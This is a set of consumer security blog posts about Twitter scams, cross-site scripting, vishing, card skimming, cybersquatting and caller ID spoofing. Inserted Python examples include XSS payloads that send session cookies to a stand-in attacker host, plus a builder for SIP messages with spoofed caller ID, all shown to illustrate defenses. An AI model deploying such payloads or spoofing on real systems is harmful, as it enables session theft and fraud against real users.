Twitter Crime on the Rise

Twitter is now beginning to see a substantial rise in active users. A recent report found that the percentage of Twitter users who have tweeted ten or more times, have more than ten followers, and follow more than ten people rose from 21% to 29% in the first half of 2010.

Spammers, scammers, and thieves are paying attention.

In the physical world, when communities become larger and more densely populated, crime rises. This also applies to online communities, like Twitter and Facebook.

Twitter’s “direct messages” and “mention” functions are laden with spam, often prompting users to click various links. Why anyone would want me to “Take a Good Look at Hypnotherapy” is beyond me, but someone must be buying because the spam keeps coming.

Common Twitter scams include:

Hijacked Accounts: Numerous Twitter (and Facebook) accounts, including those of President Obama, Britney Spears, Fox News and others have been taken over and used to ridicule, harass, or commit fraud.

Social Media Identity Theft: Hundreds of imposter accounts are set up every day. Sarah Palin, St. Louis Cardinals Coach Tony LaRussa, Kanye West, The Huffington Post, and many others have been impersonated by fake Twitter accounts opened in their names.

Worms: Twitter is periodically hit by worms, which spread messages urging users to click malicious links. When a user clicks, the malicious script runs with that user’s logged-in session and uses the account to post the same message to his followers. Soon his followers, and then their followers, are compromised as well.

DDoS Attack: A distributed denial-of-service attack left Twitter dark for more than three hours. The attack appears to have been coordinated by Russian hackers targeting a blogger in the Eastern European country of Georgia.

Botnet Controller: One Twitter account was used as a command-and-control channel: its tweets were links pointing to instructions for downloading code that enrolled users’ computers in a botnet.

Phishing: Hacked Twitter accounts are used to send phishing messages, which instruct users to click links that point to spoofed sites, where users will be prompted to enter login credentials, putting themselves at risk of identity theft.

Twitter Porn: Please, “Misty Buttons,” stop sending me invites to chat or to check out your pictures.

Twitter Spam: Shortened URLs, which hide the true destination of a link, have made Twitter’s 140 character limit the perfect launch pad for spam, shilling diet pills, Viagra and whatever else you don’t need.

To prevent social media identity theft, take ownership of your name or personal brand on Twitter. Protecting yourself from other scams requires some savvy and an unwillingness to click mysterious links. In other cases, you’ll need to keep your web browser and operating system updated in order to remain safe. Make sure to keep your antivirus software updated with the latest definitions, as well.

Robert Siciliano, personal security expert contributor to Just Ask Gemalto, discusses hacking wireless networks on Fox Boston. (Disclosures)

Cross-Site Scripting Criminal Hacks

Secure computing requires an ongoing process, as you learn about risks and then implement processes and technology to protect yourself. Without a concerted effort to defend your data, you will almost certainly be victimized by some type of cyber-invasion.

JavaScript is everywhere, making the Internet pretty and most websites user friendly. Unfortunately, hackers have learned to manipulate this ubiquitous technology for personal gain. JavaScript (not Java, which is a different technology) is the vehicle for a cross-site scripting attack, which leverages a vulnerability found in web applications that display user-supplied input without properly encoding it. The vulnerability lets an attacker inject script into a website you frequent; that script then runs in your browser with the same access to the site that you have, and can steal your session, act on your behalf, or redirect you to a site that serves malware to your PC.
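As an added illustration (example code, not from the post), here is the bug in Python, the language in which a server-side page is typically assembled: one function pastes a user-supplied search term straight into HTML, the other escapes it first, and a small check shows that the constructed payloads survive only the first. The function names, the cookie-header helper and the evil.example host are hypothetical.

```python
import html
import re

# Added example (not from the original post): the same page-rendering
# step written two ways. All names here are hypothetical.


def render_search_vulnerable(query: str) -> str:
    """Reflected XSS: the user's search term is dropped straight into markup."""
    return f"<p>Results for: {query}</p>"


def render_search_safe(query: str) -> str:
    """The term is escaped for the HTML text context before it enters the page."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def session_cookie_header(token: str) -> str:
    """Defense in depth: HttpOnly keeps document.cookie from exposing the
    session to any script that does manage to run; Secure keeps the cookie
    off plaintext HTTP."""
    return f"Set-Cookie: session={token}; Path=/; Secure; HttpOnly; SameSite=Lax"


# Crude check used only to compare the two renderers: a literal <script>
# tag, or an on*= event handler inside an open tag.
_ACTIVE_CONTENT = re.compile(r"<script\b|<\w+[^>]*\son\w+\s*=", re.IGNORECASE)


def contains_active_content(page: str) -> bool:
    return bool(_ACTIVE_CONTENT.search(page))


# Constructed attacker inputs. Either would arrive in a crafted link the
# victim is tricked into clicking; both ship the session cookie to a host
# the attacker controls.
ATTACK_PAYLOAD = '<script>new Image().src="https://evil.example/c?"+document.cookie</script>'
HANDLER_PAYLOAD = '<img src=x onerror="fetch(\'https://evil.example/c?\'+document.cookie)">'


if __name__ == "__main__":
    for payload in (ATTACK_PAYLOAD, HANDLER_PAYLOAD):
        print("vulnerable:", contains_active_content(render_search_vulnerable(payload)))
        print("safe:      ", contains_active_content(render_search_safe(payload)))
    print(session_cookie_header("deadbeef"))
```

Escaping is context-specific: html.escape is right for text and quoted attribute values, but a value dropped into a script block, a URL or a CSS rule needs the encoder for that context, which is why the instruction to "keep your browser updated" is only half the story: the fix has to be made by the site.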

Following links without knowing what they point to, using interactive forms on an untrustworthy site, or viewing online discussion groups or other pages where users may post text containing HTML tags can put your browser at risk.

Facebook, one of the most popular websites, is a likely place for JavaScript hacks, due to cross-site scripting vulnerabilities and a general lack of security awareness among Facebook users. A successful attack can allow hackers to read a victim’s private Facebook messages, access private pictures, send messages to the victim’s contacts on his or her behalf, add new (and potentially dangerous) Facebook applications, and steal the victim’s contact list.

Beware of going down the rabbit hole when browsing the Internet. Once you start clicking link after link, you may find yourself on an infected site. And look out for scams such as contests that require you to paste code into Facebook, your blog, or any other site.

To protect yourself from cross-site scripting attacks, update your browser to the most recent version, with the most current security settings.

McAfee offers a free tool, SiteAdvisor, which helps detect malicious sites. In Firefox, you can install NoScript, a plug-in that lets you control when to enable JavaScript; NoScript also maintains a whitelist of trusted sites. In Chrome, you can disable JavaScript in preferences, and in Internet Explorer, you can fiddle with the settings and adjust “Internet Zones,” but the default settings are best for most people. In Adobe Reader, JavaScript can be disabled altogether, under “Edit” and then “Preferences.”

That being said, tightening default browser or program settings reduces functionality, and may impede your ability to do much of anything online. The trick is to keep your security software fully updated and to avoid social engineering scams that ask you to click links or copy code.

Robert Siciliano, personal security expert contributor to Just Ask Gemalto, discusses scammers and thieves on The Big Idea with Donnie Deutsch. (Disclosures)

Top 5 Vishing Techniques

“Vishing” occurs when criminals call victims on the phone and attempt to lure them into divulging personal information that can be used to commit identity theft.

The name comes from “voice,” and “phishing,” which is, of course, the use of spoofed emails designed to trick targets into clicking malicious links. Instead of email, vishing generally relies on automated phone calls, which instruct targets to provide account numbers.

Vishing techniques include:

Wardialing: This is when the visher uses an automated system to call specific area codes with a message involving local or regional banks or credit unions. Once someone answers the phone, a generic or targeted recording begins, requesting that the listener enter bank account, credit, or debit card numbers, along with PIN codes.

VoIP: Voice over Internet Protocol, or VoIP, is an Internet-based phone system that facilitates vishing by making automated, high-volume calling cheap and by letting the caller set the number and name presented to the recipient. Vishers use VoIP to place their calls, and have also been known to exploit databases connected to VoIP systems.

Caller ID Spoofing: This is the practice of causing the telephone network to display a false name or number on the recipient’s caller ID. A number of companies sell tools that make this easy. VoIP makes it trivial, because the calling number is an ordinary field set by the originating system, and most carriers pass it along without verifying it. Vishers typically populate the caller ID with the name and number of a specific bank or credit union, or just with the words “Bank” or “Credit Union.”

Social Engineering: Social engineering is a fancier, more technical form of lying. Social engineering (or social penetration) techniques bypass sophisticated security hardware and software by targeting the people who use them. The automated recordings used by vishers tend to be relatively professional and convincing.

Dumpster Diving: One tried and tested “hack” is simply digging through a bank’s dumpster and salvaging any lists of client phone numbers. Once the visher has the list, he can program the numbers into his system for a more targeted attack.

To protect yourself from these scams, educate yourself. Knowledge is the key to defending yourself from vishing. The more you understand it, the better off you’ll be, so read up on vishing incidents, and if your bank provides information about vishing online or in the mail, sit up and pay attention. As this crime becomes more sophisticated, you’ll want to be up to date.

If you receive a phone call from a person or a recording requesting personal information, hang up. If the call purports to come from a trusted organization, call that entity directly, using the number on your card or statement rather than one the caller gives you, to confirm the request.

Don’t trust caller ID, which can be tampered with and offers a false sense of security.

Call your bank and report any fraud attempts immediately. The sooner you do, the more quickly the scam will be squashed.

Document the call, noting what was said, what information was requested, and, if possible, the phone number or area code of the caller, and report this to your bank.

Robert Siciliano, personal security expert contributor to Just Ask Gemalto, discusses scammers and thieves on The Big Idea with Donnie Deutsch. (Disclosures)

“Flash Attacks” Make Big Money for Debit and Credit Card Scammers

The latest ATM scam is so brilliantly simple, it’s hard to believe that it actually works. Apparently, some banks’ fraud detection systems do not flag nearly simultaneous transactions from the same account at different locations. This leaves bank customers vulnerable to what’s been termed a “flash attack,” in which multiple people, each holding a clone of a stolen debit card, withdraw cash from the same account at the same time.

Once a victim’s debit card number has been successfully skimmed, the card can be cloned, say, 100 times, and the cloned cards can be distributed to 100 people. All 100 people can then use the cloned cards to withdraw cash from 100 different ATMs within a brief window of five or ten minutes. If 100 people withdraw $200 each from the same account, at the same time, the scam nets $20,000 in almost no time.
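As an added example, not from the original post, here is the velocity check a fraud engine needs in order to catch a flash attack: sort each account’s withdrawals by time, slide a ten-minute window over them, and flag the account when one window spans more than two distinct ATMs or more than $500 in total. The account numbers, ATM identifiers and withdrawal records are constructed; the thresholds are hypothetical and would be tuned per bank.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Added example (not from the original post): the velocity rule a fraud
# engine needs to catch a flash attack. Data and names are constructed.

# Constructed sample withdrawals: (account, atm_id, timestamp, amount_usd).
# ACCT-0001 is ordinary use; ACCT-0002 is six clones hitting six ATMs in
# under six minutes.
WITHDRAWALS = [
    ("ACCT-0001", "ATM-BOS-01", datetime(2010, 8, 2, 9, 0, 0), 100),
    ("ACCT-0001", "ATM-BOS-01", datetime(2010, 8, 2, 9, 2, 0), 60),
    ("ACCT-0001", "ATM-BOS-07", datetime(2010, 8, 2, 18, 30, 0), 200),
    ("ACCT-0002", "ATM-NYC-11", datetime(2010, 8, 2, 14, 0, 5), 200),
    ("ACCT-0002", "ATM-NYC-12", datetime(2010, 8, 2, 14, 0, 40), 200),
    ("ACCT-0002", "ATM-NYC-19", datetime(2010, 8, 2, 14, 1, 10), 200),
    ("ACCT-0002", "ATM-NYC-23", datetime(2010, 8, 2, 14, 2, 0), 200),
    ("ACCT-0002", "ATM-NYC-27", datetime(2010, 8, 2, 14, 3, 30), 200),
    ("ACCT-0002", "ATM-NYC-31", datetime(2010, 8, 2, 14, 5, 45), 200),
]


def flag_flash_attacks(records, window=timedelta(minutes=10), max_atms=2, max_amount=500):
    """Slide a time window over each account's withdrawals, sorted by time.
    An account is flagged when any window covers more than `max_atms`
    distinct machines or more than `max_amount` in total. Returns
    {account: (distinct_atms, total, window_start)} for the worst window seen."""
    by_account = defaultdict(list)
    for account, atm, ts, amount in records:
        by_account[account].append((ts, atm, amount))

    flagged = {}
    for account, rows in by_account.items():
        rows.sort()
        start = 0
        for end in range(len(rows)):
            # Advance the window start until the span fits inside `window`.
            while rows[end][0] - rows[start][0] > window:
                start += 1
            span = rows[start:end + 1]
            atms = {atm for _, atm, _ in span}
            total = sum(amount for _, _, amount in span)
            if len(atms) > max_atms or total > max_amount:
                prev = flagged.get(account)
                if prev is None or (len(atms), total) > (prev[0], prev[1]):
                    flagged[account] = (len(atms), total, span[0][0])
    return flagged


if __name__ == "__main__":
    for account, (atms, total, since) in flag_flash_attacks(WITHDRAWALS).items():
        print(f"{account}: {atms} ATMs, ${total} since {since:%H:%M:%S}")
```

The rule fires on ACCT-0002 at the third withdrawal, well before the hundredth clone has cashed out; a real engine would also block further withdrawals on the account the moment it fires rather than merely report them.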

Your credit or debit card number can be skimmed in a number of different ways:

Wedge Skimming: The most common type of skimming occurs when a salesperson or waiter takes your credit or debit card and runs it through a hand-held card reader, which copies the information contained in the card’s magnetic stripe. Once the thief has obtained the card data, he can encode it onto a blank card, or simply use the number to make purchases online or over the phone.

POS Swaps: Many people pay for goods or services by swiping a credit or debit card through the in-store point of sale machines. EFTPOS (electronic funds transfers at the point of sale) skimming occurs when the point of sale terminal has been replaced with a skimming device. In Australia, fast food chains, convenience stores, and specialty clothing stores have been common targets. McDonald’s, for example, has been hit with this scam.

ATM Skimmers: A card reader device can also be placed on the face of an ATM, disguised as part of the machine. It’s almost impossible for the average user to recognize a skimmer unless it is of poor quality, or the user has an eye for security. Often, the thieves will hide a small pinhole camera in a brochure holder, light bar, mirror or a speaker resembling a car stereo on the face of the ATM in order to capture the victim’s PIN. The device may use Bluetooth or cellular technology so the thieves can retrieve the data remotely. Gas pumps are equally vulnerable to this type of scam.

Data Interceptors: Rather than simply placing a skimmer on the face of a gas pump, some criminals place a data-stealing device inside the pump. Posing as a fuel pump technician, a criminal can use a universal key purchased on eBay to access the terminal. Once inside, they unplug a cable that connects the keypad to the display, and piggyback their own device within the mechanism, in order to capture all the unencrypted card data.

Dummy ATMs: ATMs can easily be purchased through eBay or other outlets, and installed in any heavily trafficked location. The machine, which might be powered by car batteries or plugged into the nearest outlet, is programmed to read and record card data. I found one advertised on Craigslist and picked it up at a nearby bar, for $750 from a guy named Bob.

Once credit card numbers have been skimmed, hackers can copy the data on to blank cards, hotel keys, or “white cards,” which are effective at self-checkouts, or in situations where the thief knows the salesperson and is able to “sweetheart” the transaction. A white card can also be pressed with foils, giving it the appearance of a legitimate credit card.

Federal law limits cardholder liability for credit card fraud to $50, as long as the cardholder disputes the charge within 60 days of the statement on which it appears. For debit cards the rules are stricter: the $50 limit applies only if the bank is notified within two business days of learning that the card or PIN has been lost or stolen; after that the maximum liability rises to $500, and unauthorized transactions not reported within 60 days of the statement can leave the cardholder liable for the entire amount.

When using an ATM, gas pump, or point of sale terminal, always cover your PIN.

As inconvenient as this may seem, regular debit card users should check online statements daily.

Consider limiting your debit card use. I use mine only two or three times a month, for deposits and withdrawals.

Robert Siciliano, personal security expert contributor to Just Ask Gemalto, discusses credit and debit card fraud on CNBC. (Disclosures)

Protecting Children on the Internet

Today’s kids don’t even know what it’s like to not be connected to the Internet. But being technology savvy doesn’t mean they are safe and secure.

Since the Internet as we know it was born in the early 1990s, it has become an integral part of our and our kids’ lives. Online shopping, social media, mobile web, and computers in the classroom are as normal to them as riding a Huffy bicycle was to me. For these kids’ parents, the online world often feels too fast and too complicated. Nevertheless, it is essential that parents educate themselves on safe, secure online practices in order to set a positive example and provide guidance for their children as they navigate the web.

Fortunately, safe and appropriate online behavior isn’t much different than in the real world. The main distinction is that on the Internet, it is necessary to be particularly sensitive regarding how and with whom you communicate.

Parents who lack experience with the Internet, computers, or mobile phones must learn the basics before they can adequately monitor their children’s habits. A parent’s discomfort or unfamiliarity with technology is no excuse to let a child run wild on the Internet.

As with any task, one should start with the fundamentals. In recognition of National Cyber Security Awareness Month, let’s go over some of those fundamentals:

  • Spend as much time as possible with kids in their online world. Learn about the people with whom they interact, the places they visit, and the information they encounter. Be prepared to respond appropriately, regardless of what sort of content they find. Remember, this is family time.
  • One popular tactic has been to set up the computer in a high-traffic family area, and to limit the time children may spend using it. This is still good advice, but it becomes less feasible as more children have their own laptops and mobile phones, which can’t be so easily monitored.
  • Teach children to recognize inappropriate behavior. Kids will be kids, but that doesn’t mean it’s okay to say mean things, send racy pictures, make rude requests, or suggest illegal behavior. If it isn’t okay in the physical world, it isn’t okay on the Internet.
  • Consider investing in computer security software with parental controls, which limit the sites kids can access.
  • Decide exactly what is and is not okay with regards to the kinds of websites kids should visit. This dialogue helps parents and children develop a process for determining appropriate online behavior.
  • Children should be restricted to monitored, age-appropriate chat rooms. Spend time with your children to get a feel for the language and discussion occurring on the websites they wish to visit.
  • Do not allow children to create usernames that reveal their true identities or are provocative.
  • Children should be reminded never to reveal passwords, addresses, phone numbers, or other personal information.
  • Kids should not be permitted to post inappropriate photos or photos that may reveal their identities. (For example, a photo in which a t-shirt bears the name of the child’s city or school.)
  • Never allow a child to meet an online stranger in person.
  • Children should be taught not to open online attachments from strangers.

Robert Siciliano, personal security expert contributor to Just Ask Gemalto, discusses online predators on Fox News. Disclosures

15 Facebook Fiascos to Watch Out For

The following 15 activities, all of which are facilitated by Facebook and other social networking websites, are causing lots of heartache and headaches:

1. Posting illegal activities. In the little town where I grew up, 30 kids recently faced the wrath of their parents, school officials, law enforcement, and the Boston media, all because someone posted their party pictures, which depicted underage drinking, on Facebook. It’s never okay to show illegal behavior.

2. Account hijacking. Phishers imitate the Facebook email template, tricking victims into believing they have received an official Facebook message. Once you enter your login credentials on the phishing page, criminals can take over your account, pose as you, and ask your friends for money. Always log into your Facebook account manually, rather than going through a link in an email.

3. Facebook bullying. It is so much easier to write something awful about someone than it is to say it to them personally. Words hurt. Vicious words have led to kids committing suicide. Friend your kids and see what their online dialogue looks like.

4. Online reputation management (or lack thereof). I’ve seen teachers, professors, students, officials, police, and others from just about every walk of life get fired because of words or pictures they posted on Facebook. Remember, if what you post wouldn’t pass the potential employer test, don’t do it.

5. Social media identity theft. When someone snags your name, posts a photo as you, and begins to communicate while impersonating you, the effects can be devastating. Grab your name on as many sites as possible, including Facebook. Knowem.com can help speed up this process.

6. Financial identity theft. Bad guys use Facebook to get around your passwords. Most online accounts use “security questions” to verify your identity when you reset a password. These questions tend to involve personal information, such as your kids’, other relatives’, or pets’ names or birthdays. When the bad guys find this information on your Facebook page, they can answer the questions, reset your passwords, and steal your identity. So limit what you post, lock down your privacy settings, and treat security-question answers like passwords: use answers no one could look up.

7. Burglaries. Criminals have been known to check Facebook statuses to determine if potential victims are home or not. Publicly declaring that you’re not home creates an opportune time for burglars to ransack your house. Never post this information on Facebook.

8. Geo-stalking. Location-based GPS technologies incorporated into social media are perfect tools for stalkers to home in on their target. Please just turn these settings off.

9. Corporate spying. By posing as an employee, setting up a Facebook group, and inviting all the company’s employees to join, the bad guy gathers intelligence that enables him to commit espionage from within the organization.

10. Harassment. This goes beyond bullying. In one example, a woman was on a camping trip and unreachable by phone when her Facebook account was taken over. The “harasser” wrote all kinds of desperate status updates posing as the woman, leading concerned friends and law enforcement to her house, where they broke down her door.

11. Government spying. Who is that new friend? The AP reports, “U.S. law enforcement agents are following the rest of the Internet world into popular social-networking services, going undercover with false online profiles to communicate with suspects.” Just don’t be a “suspect.”

12. Sex offenders. Facebook is perfect for sex offenders, who pose as real nice people until they gain their victims’ trust. Always be on guard, and do background checks, at least.

13. Scams. It’s just a matter of setting up a fake Facebook page and marketing it to a few people, who then send it to their friends, who send it to their friends. An Ikea scam hooked 40,000 unsuspecting victims with the promise of a $1,000 gift card. Like mom said, if it sounds too good to be true, it’s probably not true.

14. Legal liabilities. In New York, a judge recently ruled that material posted on Facebook and other social networking websites can be used as evidence in court, regardless of whether the posts were hidden by privacy settings.

15. Zero privacy. If you think for one second that what you post on Facebook is for you and your friends’ eyes only, you simply don’t understand how the Internet works. Many sites are capable of pulling data from the bowels of Facebook, despite any privacy settings you may have in place. And that data can be stored forever, which means that it can come back to bite you long after you’ve forgotten you ever posted it.

Robert Siciliano, personal security expert contributor to Just Ask Gemalto, discusses hackers on social media on CNN. Disclosures


Cybersquatting Scams Aren’t Over Yet

Cybersquatting, simply put, is the act of registering a domain name that contains someone else’s trademarked brand name. The Anti-cybersquatting Consumer Protection Act, a U.S. federal law enacted in 1999, describes cybersquatting as registering, trafficking in, or using a domain name with bad faith intent to profit from the goodwill of a trademark belonging to someone else.

Cybersquatters squat for many reasons. Some squat for fun or because they like the brand or name, while other squatters use the domain to advertise competitors’ wares, or for stalking, harassment, or outright fraud. Most cybersquatters offer to sell the domain at an inflated price to the person or company who owns the trademark contained within the domain name.

In particularly malicious cases of cybersquatting, identity thieves register a domain similar to that of a bank or other trustworthy entity in order to host a spoofed website for phishing. If the desired domain isn’t available, typosquatting is the next best option: registering common misspellings of the target, so that anyone who mistypes the address lands on the fake. After Annualcreditreport.com launched, more than 200 similar domains were quickly snapped up.
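As an added example (not from the original post), the following Python generates the near-miss domains a typosquatter would register for a target and matches them against a list of observed registrations, which is the approach brand-monitoring tools take. The target is Annualcreditreport.com, mentioned above; the observed list, the look-alike character table and the function names are constructed.

```python
# Added example (not from the original post): generate the look-alike
# domains a typosquatter registers and match them against observed
# registrations. The observed list and the tables are constructed.

HOMOGLYPHS = (("l", "1"), ("o", "0"), ("i", "1"), ("m", "rn"), ("w", "vv"))
VOWELS = "aeiou"


def typo_variants(domain, tlds=("com", "net", "org", "co")):
    """Return the set of look-alike domains for `domain`: single-character
    omissions, doubled characters, vowel swaps, adjacent transpositions,
    an inserted hyphen, look-alike characters, and alternate TLDs."""
    name, tld = domain.lower().rsplit(".", 1)
    names = set()
    for i in range(len(name)):
        names.add(name[:i] + name[i + 1:])                 # omission
        names.add(name[:i] + name[i] + name[i:])           # doubled character
        if name[i] in VOWELS:
            for v in VOWELS:
                names.add(name[:i] + v + name[i + 1:])     # vowel swap
    for i in range(len(name) - 1):
        names.add(name[:i] + name[i + 1] + name[i] + name[i + 2:])  # transposition
        names.add(name[:i + 1] + "-" + name[i + 1:])                # hyphenation
    for a, b in HOMOGLYPHS:
        if a in name:
            names.add(name.replace(a, b))                  # look-alike characters
    names.discard(name)                                    # never report the real name
    variants = {f"{n}.{t}" for n in names for t in tlds}
    variants.update(f"{name}.{t}" for t in tlds if t != tld)   # TLD swap of the real name
    return variants


def find_lookalikes(domain, observed):
    """Observed domains that are typo variants of `domain`, sorted."""
    candidates = typo_variants(domain)
    return sorted(d.lower() for d in observed if d.lower() in candidates)


# Constructed list of registrations, as seen in a zone file or WHOIS feed.
OBSERVED = [
    "annualcreditreport.com",    # the genuine site
    "annualcreditreprot.com",    # transposition
    "anualcreditreport.com",     # omission
    "annualcreditreport.co",     # TLD swap
    "annualcreditrep0rt.net",    # zero for the letter o, on a different TLD
    "freecreditreport.com",      # unrelated (and not a typo of the target)
    "example.org",
]


if __name__ == "__main__":
    for hit in find_lookalikes("annualcreditreport.com", OBSERVED):
        print("look-alike registered:", hit)
```

In practice the candidate set is resolved against DNS or checked against new-registration feeds; a generated name that suddenly resolves, especially to a host serving a login page, is the signal worth acting on.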

Computerworld discussed the havoc that cybersquatting can wreak on a brand’s reputation. Sometimes, criminals copy a brand’s entire website in order to collect usernames and passwords from unwitting visitors. The hackers then test those names and passwords on other websites. Cybersquatting increased by 18% last year, with a documented 440,584 cybersquatting sites in the fourth quarter alone, according to MarkMonitor’s annual Brandjacking Index report.

I’ve written before about the time I was accused of cybersquatting. I wasn’t, I swear! I bought myself some domains in the early ’90s, way before cybersquatting was illegal. I sold some, and regrettably gave up some others. And there was one that will haunt me until the day I die. I owned LedZeppelin.com for five or six years. Led Zeppelin was and is my favorite band, and as a fan, I bought the domain as a keepsake. I would get emails from people all over the world, saying things like, “I am Paulo from Brazil, I love the Led Zep!”

With cybersquatting on the rise, it makes sense to claim your name, your brand name, and your kids’ names as soon as possible. New domain extensions come out all the time. The .co top-level domain recently launched without much fanfare, but it creates a new opportunity for criminals to hijack your brand. I just snagged “siciliano.co.” So go get your domain before the bad guy does!

Robert Siciliano, personal security expert contributor to Just Ask Gemalto, discusses hackers hacking social media on Fox Boston. Disclosures

Criminal Hackers: The Soldiers of the Web Mob

Today’s criminal hackers are very different from those who hacked for fun and fame a decade ago. Every week, I see stories about more criminals in faraway lands, making millions from various scams, emptying the bank accounts of small businesses or draining the financial reserves of entire towns.

High-tech crimes can be committed by lone individuals, by small groups, or by organized web mobs. These web mobs structurally resemble the longtime operation of the Russian and Italian mafias, the Irish mob, the Bandidos, and the Hells Angels.

The Anti-Phishing Working Group has noted the success of Avalanche, a particularly large and successful web mob with an emphasis on phishing: “Phishing has always been attractive to criminals because it has low start-up costs and few barriers to entry. But by mid-2009, phishing was dominated by one player as never before: the ‘Avalanche’ phishing operation. This criminal entity is one of the most sophisticated and damaging on the Internet, and perfected a mass-production system for deploying phishing sites and crimeware, malware designed specifically to automate identity theft and facilitate unauthorized transactions from consumer bank accounts.”

Avalanche was responsible for two-thirds of all phishing attacks launched in the second half of 2009, and for the overall increase in phishing attacks across the Internet.

Cybercrime of this magnitude requires a carefully ordered hierarchy. The players include:

  • Programmers, who write the viruses that will infect victims’ PCs
  • Carders, who sell stolen credit card data
  • IT guys, or black hat computer professionals, who maintain the hardware necessary to keep the operation running
  • Hackers, who look for vulnerabilities in networks and plant malicious code
  • Social engineers, who come up with the scam and write phishing emails to send to potential victims
  • Money mules, who are often foreign, traveling to the US specifically to open bank accounts, and who may also launder money
  • Bosses, who run the show, bring together talent, manage, and delegate

All of this is very real and it is happening right now. Even though data security hasn’t been in the media spotlight this year, we should all be aware of these risks.

To protect yourself from the bad guy, make sure your PC is fully updated with critical security patches, antivirus software, anti-spyware software, a secure wireless connection, and a two-way firewall. Check your online account statements frequently, and consider investing in identity theft protection that monitors your credit reports and watches for your information in the Internet’s back-alley chat rooms.

Robert Siciliano, personal security expert contributor to Just Ask Gemalto, discusses hackers hacking wireless networks on Fox Boston. Disclosures

7 Tips To Better Credit Card Security

Every time you use a credit card, you increase the chances of that card number being used fraudulently. Cards can be skimmed and hacked in a number of different ways.

#1 Watch your card. Whenever you hand your credit or debit card to a salesperson or waiter, watch to see where your card is taken and what is done with it. It’s normal for the card to be swiped through a point of sale terminal or a keypad card reader. But if you see your card swiped through an additional reader that doesn’t coincide with the transaction, the card number may have been stolen.

#2 Cover your PIN. There may be cameras or “shoulder surfers” recording your PIN at an ATM or point of sale terminal. Cover up the keypad to foil the bad guys’ plan.

#3 Change up your card number. This is inconvenient but effective. The more frequently you change your number, the more secure that number will be. Once or twice a year is good.

#4 Select online shopping websites carefully. When searching for a product or service online, do business only with those you recognize. Established e-retailers are your safest bet.

#5 Beware of phishing. Never purchase products or services by responding to an email. This generally results in your card number being phished.

#6 Use secure sites. Before entering a credit card number, always look for “https” in the address bar. The “s” in “https” means the connection between your browser and the site is encrypted, so the card number can’t be read in transit. It does not vouch for the merchant itself, so combine this with tip #4.

#7 The most important tip of all is to watch your statements. This extra layer of protection requires special attention. If you check your email daily, you ought to be able to check your credit card statements daily, too, right? Once a week is sufficient, and even once every two weeks is okay. Just be sure to dispute any unauthorized withdrawals or transactions within the time limit stipulated by your bank. For most credit cards, federal law gives you 60 days from the statement date; for debit cards, your liability grows the longer you wait, and unauthorized transactions not reported within 60 days of the statement may not be covered at all.

Robert Siciliano, personal security expert contributor to Just Ask Gemalto, discusses credit card fraud on NBC Boston. Disclosures



Caller ID: Tool for Scammers

Most of us tend to trust the person on the other end of the telephone more than we trust an email in our inbox. However, telephone scams continue to plague people and successfully empty victims’ bank accounts.

Caller ID spoofing occurs when your phone rings and your caller ID displays a name and number that seem legitimate, but are, in fact, spoofed. The caller has masked his or her true name and number. Most people aren’t aware of caller ID spoofing, and therefore have no reason to question the phone call’s legitimacy.

Caller ID spoofing is often sold as a tool for law enforcement. It can provide a useful disguise if, for instance, a suspect has been withholding child support. But a civilian who suspects a spouse of infidelity might use caller ID spoofing to conduct his or her own investigation. On-call doctors who wish to keep their phone numbers private may need to provide spoofed numbers for clients.

The fraudulent uses for caller ID spoofing vastly outweigh the legitimate ones. Anyone can obtain this technology and pose as law enforcement, a lottery, a charity, a government agency, a credit card company, or anything else that might be lucrative. Abuses of caller ID spoofing have raised hackles with government officials.

Don’t automatically trust the information displayed by your caller ID.

No matter what your caller ID says, never give out personal information over the phone.

If a caller tells you you’ve won something or stand to lose something, tell them you’ll be happy to discuss it further, but that you’ll have to call them back. Then go online, search for a valid number, and call to confirm the details. Never call back on a number the caller gives you.
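The reason caller ID deserves so little trust, on a VoIP call at least, is that the presented name and number are a plain text field in the SIP INVITE, filled in by whoever originates the call. As an added example (not from this post or from the vishing post above, both of which describe caller ID spoofing), the following Python builds two such INVITEs and shows the one screening check a carrier or PBX can actually rely on: whether the trunk the packet physically arrived from is allowed to present that number. The IP addresses, phone numbers, trunk table and function names are constructed.

```python
import re

# Added example (not from the original posts): the calling number on a
# VoIP call is just a text field in the SIP INVITE's From header, set by
# whoever originates the call. Hosts, numbers and names are constructed.

_FROM = re.compile(r'^From:\s*(?:"([^"]*)"\s*)?<sip:(\+?\d+)@([^;>]+)>', re.MULTILINE)


def build_invite(display_name, from_number, source_host, to_number="+16175550100"):
    """Assemble a minimal SIP INVITE the way an originating PBX would.
    Nothing stops the PBX operator from putting any name or number here."""
    return "\r\n".join([
        f"INVITE sip:{to_number}@carrier.example SIP/2.0",
        f"Via: SIP/2.0/UDP {source_host}:5060;branch=z9hG4bK776asdhds",
        f'From: "{display_name}" <sip:{from_number}@{source_host}>;tag=1928301774',
        f"To: <sip:{to_number}@carrier.example>",
        f"Call-ID: a84b4c76e66710@{source_host}",
        "CSeq: 314159 INVITE",
        "Content-Length: 0",
        "",
        "",
    ])


def parse_from_header(message):
    """Return (display_name, number, host) from the From header, or None."""
    m = _FROM.search(message)
    if not m:
        return None
    return (m.group(1) or "", m.group(2), m.group(3))


# Numbers each trunk (identified by the IP the packet actually came from)
# is allowed to present: the subscriber's own lines. Constructed.
TRUNK_NUMBERS = {
    "203.0.113.45": {"+16175550199"},
}


def caller_id_is_consistent(message, source_ip, trunk_numbers=TRUNK_NUMBERS):
    """Accept the presented number only if the trunk that sent the packet
    owns it. The check keys on the network source address, never on the
    Via or From host, since both of those are written by the caller too."""
    parsed = parse_from_header(message)
    if parsed is None:
        return False
    _, number, _ = parsed
    return number in trunk_numbers.get(source_ip, set())


# A spoofed call: the trunk presents a bank's toll-free number and name.
SPOOFED = build_invite("First National Bank", "+18005551234", "203.0.113.45")
# The same trunk presenting its own number.
LEGIT = build_invite("Acme Plumbing", "+16175550199", "203.0.113.45")


if __name__ == "__main__":
    for label, msg in (("spoofed", SPOOFED), ("legit", LEGIT)):
        name, number, _ = parse_from_header(msg)
        ok = caller_id_is_consistent(msg, "203.0.113.45")
        print(f"{label}: displays {name!r} {number}, trunk may present it: {ok}")
```

The recipient’s handset never sees this check; it displays whatever the last carrier in the chain forwarded. That is why the advice above to hang up and call a number you looked up yourself is the only defense the called party controls.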

Robert Siciliano, personal security expert contributor to Just Ask Gemalto, discusses another databreach on Fox News. Disclosures